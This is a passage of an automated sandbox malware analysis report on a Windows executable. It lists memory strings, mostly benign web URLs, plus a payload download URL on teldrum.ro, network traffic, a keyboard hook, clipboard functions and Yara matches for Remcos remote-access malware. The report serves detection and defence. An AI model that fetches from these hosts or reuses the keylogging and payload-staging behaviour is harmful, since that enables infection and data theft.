              Source: bhvF184.tmp.3.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhvF184.tmp.3.drString found in binary or memory: https://sectigo.com/CPS0
              Source: 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908947338.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909356057.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909941573.0000000002312000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhvF184.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvF184.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvF184.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?fa0d4adae7a556f7d0d03112de822178
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhvF184.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: 2T10XBqS6g.exe, 00000003.00000003.29912000808.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhvF184.tmp.3.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?3d88065febcc552cae09e5e8b74c55d5
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?7616d616e1c668bb563496121e660bee
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?01af3f8dd36bcb49643452aa096ff6c0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?7de2246f1808e47769e35183d0153a7a
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?d0400e0387468531bdf7da710e2ae325
              Source: bhvF184.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?f0f9f226f444e2e246f9075ea908a633
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
              Source: 2T10XBqS6g.exe, 00000002.00000002.30676309614.0000000032490000.00000004.00001000.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.00000000028E9000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
              Source: 2T10XBqS6g.exe, 00000002.00000002.30676309614.0000000032490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binVentsDyrcrestereamuschilor.ro/NJrdZqNcCtz102.bin
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.00000000028E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin_
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.00000000028E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bins
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhvF184.tmp.3.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhvF184.tmp.3.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhvF184.tmp.3.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhvF184.tmp.3.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.google.com/
              Source: 2T10XBqS6g.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://www.google.com/chrome/
              Source: 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: 2T10XBqS6g.exe, 00000003.00000003.29909567301.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908861604.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908947338.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909356057.0000000002319000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/
              Source: 2T10XBqS6g.exe, 00000003.00000003.29904972757.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29905258088.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: bhvF184.tmp.3.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49765 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\2T10XBqS6g.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_0040987A
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_00406DFC
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00406E9F
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004068B5
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004016FD NtdllDefWindowProc_A,4_2_004016FD
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004017B7 NtdllDefWindowProc_A,4_2_004017B7
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00402CAC NtdllDefWindowProc_A,5_2_00402CAC
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00402D66 NtdllDefWindowProc_A,5_2_00402D66
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00403645 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_70251BFF0_2_70251BFF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A3B5C12_2_33A3B5C1
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00406E8F3_2_00406E8F
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044B0403_2_0044B040
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0043610D3_2_0043610D
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004473103_2_00447310
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044A4903_2_0044A490
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040755A3_2_0040755A
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0043C5603_2_0043C560
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044B6103_2_0044B610
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044D6C03_2_0044D6C0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004476F03_2_004476F0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044B8703_2_0044B870
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044081D3_2_0044081D
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004149573_2_00414957
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004079EE3_2_004079EE
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00407AEB3_2_00407AEB
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044AA803_2_0044AA80
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00412AA93_2_00412AA9
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00404B743_2_00404B74
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00404B033_2_00404B03
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044BBD83_2_0044BBD8
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00404BE53_2_00404BE5
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00404C763_2_00404C76
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00415CFE3_2_00415CFE
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00416D723_2_00416D72
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00446D303_2_00446D30
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00446D8B3_2_00446D8B
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004050384_2_00405038
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0041208C4_2_0041208C
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004050A94_2_004050A9
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0040511A4_2_0040511A
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0043C13A4_2_0043C13A
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004051AB4_2_004051AB
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004493004_2_00449300
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0040D3224_2_0040D322
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0044A4F04_2_0044A4F0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0043A5AB4_2_0043A5AB
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004136314_2_00413631
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004466904_2_00446690
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0044A7304_2_0044A730
